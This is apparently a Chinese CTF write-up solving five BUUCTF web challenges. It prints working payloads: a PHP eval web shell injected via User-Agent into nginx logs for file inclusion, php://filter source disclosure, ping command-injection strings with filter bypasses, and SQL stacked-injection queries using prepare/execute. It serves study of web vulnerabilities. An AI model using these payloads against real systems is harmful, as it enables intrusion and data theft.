BUUCTF-WEB(4-8)

[ACTF2020 新生赛]Include

打开题目，是一个超链接，点击后，发现URL发生了变化

可以看出是文件包含，包含了一个flag.php的文件

我们试着访问/etc/passwd

我又试了试伪协议，显然是被过滤了

然后我们就访问了一下nginx的日志，访问成功

?file=/var/log/nginx/access.log

那我们就是UA头写马吧

<?php @eval($_POST['cmd']);?>

然后我们就用那个nginx日志的那个URL，然后连接密码为cmd，去用蚁剑连接一下

连接成功后，在根目录找到flag，然后得出结论我是傻逼

后来我又看了一下文件

原来伪协议，还可以用，我们应该用伪协议去看那个flag.php的源码

就用php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

就得到源码被base64加密后的数据，我们解密一下

终于拿到flag了，我真要哭了

[ACTF2020 新生赛]Exec

这道题熟悉的ping，我们就复习一下命令连接符就行了

Windows和Linux都支持的命令连接符：cmd1 | cmd2 只执行cmd2cmd1 || cmd2 只有当cmd1执行失败后，cmd2才被执行cmd1 & cmd2 先执行cmd1，不管是否成功，都会执行cmd2cmd1 && cmd2 先执行cmd1，cmd1执行成功后才执行cmd2，否则不执行cmd2Linux还支持分号（;），cmd1;cmd2 按顺序依次执行，先执行cmd1再执行cmd2

那我们就无需多言，直接战斗

127.0.0.1 | whoami

直接拿下flag

127.0.0.1 | cat /flag

[GXYCTF2019]Ping Ping Ping

参考：

命令执行漏洞各种绕过方式_命令执行漏洞 变种 绕过-CSDN博客

命令执行RCE及其绕过详细总结（各情景下的绕过）_rce反弹shell绕过-CSDN博客

这道题还是PING,只不过是GET方式传参

我直接满心欢喜准备拿下

?ip=127.0.0.1 | ls

他显然过滤了空格，气的暴骂我

那我们就绕过空格,我就不用空格了

?ip=127.0.0.1|ls

直接索要flag,这里我发现了哈，有一些符号他也过滤了，比如小数点，单引号，双引号，括号，大括号啥的

但是能用的就是

$ - ~ \ `

他直接大骂fxxk

因为反引号可以用，而且ls已经看到了flag.php

payload

?ip=127.0.0.1|cat$IFS`ls`

然后只能回显index.php的内容，不要怀疑自己，直接看源码

[SUCTF 2019]EasySQL

参考

[BUUCTF：SUCTF 2019]EasySQL-CSDN博客

[buuctf-SUCTF 2019]EasySQL 1（小宇特详解）-CSDN博客

这个题目就是我挺云里雾里的（我太菜了），挺多字符都被过滤之后，看到分号，然后就是尝试堆叠注入

查库名

1; show databases;

查表名

1;use ctf;show tables;

查列名

1;show columns from Flag;

然后发现查不到

然后大佬们说语句就长这样（我还是不太理解）,可以看一下大佬们的分析

$sql = "select ".$post['query']."||flag from Flag";

然后payload就是

*,1

[强网杯 2019]随便注

参考：

[强网杯 2019]随便注 - chalan630 - 博客园 (cnblogs.com)

我们先判断这个数字还是字符

?inject=1' and '1'='1 正常回显
?inject=1' and '1'='2 错误回显

判断出是字符注入，然后是单引号闭合

?inject=1' order by 2--+
?inject=1' order by 3--+

判断出是两个字段

然后继续的时候，发现过滤了一些函数

这边我试了一下，注释符绕不过去的，所以这里我想到了堆叠注入，就是上一题学的

查库名：

?inject=1';show database;#

查表名

?inject=1';show tables;#

查列名

?inject=1';show columns from words;#

?inject=1%27;show%20columns%20from%20`1919810931114514`;#
注意数据表为数字的时候需要用反引号括起来

flag在这个数字这个表

这道题到这里，我就完全不会了，一点儿都不知道怎么给flag这个查询出来

最后的flag的payload为：

-1';
sEt @sql=CONCAT('se','lect * from `1919810931114514`;');
prEpare stmt from @sql;
execute stmt;